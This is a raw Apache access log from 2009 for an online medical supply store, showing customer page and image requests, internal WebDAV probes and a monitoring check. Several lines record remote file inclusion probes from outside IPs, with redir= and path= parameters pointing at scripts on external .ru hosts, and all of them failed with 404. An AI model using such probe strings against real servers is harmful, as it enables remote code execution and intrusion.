172.16.1.180 - - [10/Jun/2009:08:00:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:01:36 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:01:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:01:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
70.61.119.142 - - [10/Jun/2009:08:01:48 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:45 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG HTTP/1.1" 200 59518 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A484BB207000BBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:48 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:48 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:48 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:48 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:48 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:48 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:48 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:48 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:48 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:49 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:49 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:49 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:49 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:49 -0400] "GET /images/bt_cal-a.gif HTTP/1.1" 200 504 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:49 -0400] "GET /images/AMEX.GIF HTTP/1.1" 200 2378 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
89.223.3.98 - - [10/Jun/2009:08:01:49 -0400] "GET /logs/access_log.Q109052900/index.php?redir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:08:01:49 -0400] "GET /logs/access_log.Q109051000/index.php?redir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
70.61.119.142 - - [10/Jun/2009:08:01:49 -0400] "GET /images/DISCOVER.GIF HTTP/1.1" 200 2579 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:49 -0400] "GET /images/MCARD.GIF HTTP/1.1" 200 2789 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:49 -0400] "GET /images/VISA.GIF HTTP/1.1" 200 2800 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:49 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:50 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:50 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:50 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:50 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:50 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:50 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:50 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:50 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:50 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:01:50 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
77.221.152.82 - - [10/Jun/2009:08:01:58 -0400] "GET /logs/show.php?path=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:08:01:58 -0400] "GET /logs/access_log.Q109052100/show.php?path=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:08:01:58 -0400] "GET /show.php?path=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
172.16.1.71 - - [10/Jun/2009:08:02:18 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.71 - - [10/Jun/2009:08:02:18 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.71 - - [10/Jun/2009:08:02:18 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
70.61.119.142 - - [10/Jun/2009:08:02:29 -0400] "GET /images/processcard.gif HTTP/1.1" 200 420 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
209.59.12.99 - - [10/Jun/2009:08:02:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.152.82 - - [10/Jun/2009:08:02:34 -0400] "GET /logs/error_log.Q109060300/show.php?path=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
172.16.1.79 - - [10/Jun/2009:08:02:36 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [10/Jun/2009:08:02:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [10/Jun/2009:08:02:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:02:45 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:02:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:02:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
70.61.119.142 - - [10/Jun/2009:08:02:30 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4E4922C7007F0E046+M37+ENG HTTP/1.1" 200 40223 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4F4702A7001CBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4E4922C7007F0E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:06 -0400] "GET /images/sd_left-space.gif HTTP/1.1" 200 50 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4E4922C7007F0E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:06 -0400] "GET /images/sd_left-top.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4E4922C7007F0E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:06 -0400] "GET /images/sd_left-bottom.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4E4922C7007F0E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:06 -0400] "GET /images/sd_bottom-space.gif HTTP/1.1" 200 50 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4E4922C7007F0E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:06 -0400] "GET /images/sd_bottom-right.gif HTTP/1.1" 200 101 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4E4922C7007F0E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:06 -0400] "GET /images/sd_inside-corner.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4E4922C7007F0E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:10 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+ORDCONF+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L001F874943D2A700636E046+LSTWSEQ(S0060):1 HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:14 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:22 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+ORDCONF+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L001F874943D2A700636E046+LSTWSEQ(S0060):1 HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:24 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:32 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG HTTP/1.1" 200 40487 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:33 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:33 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:33 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:33 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:33 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:34 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:34 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:34 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:34 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:34 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:34 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:34 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:34 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
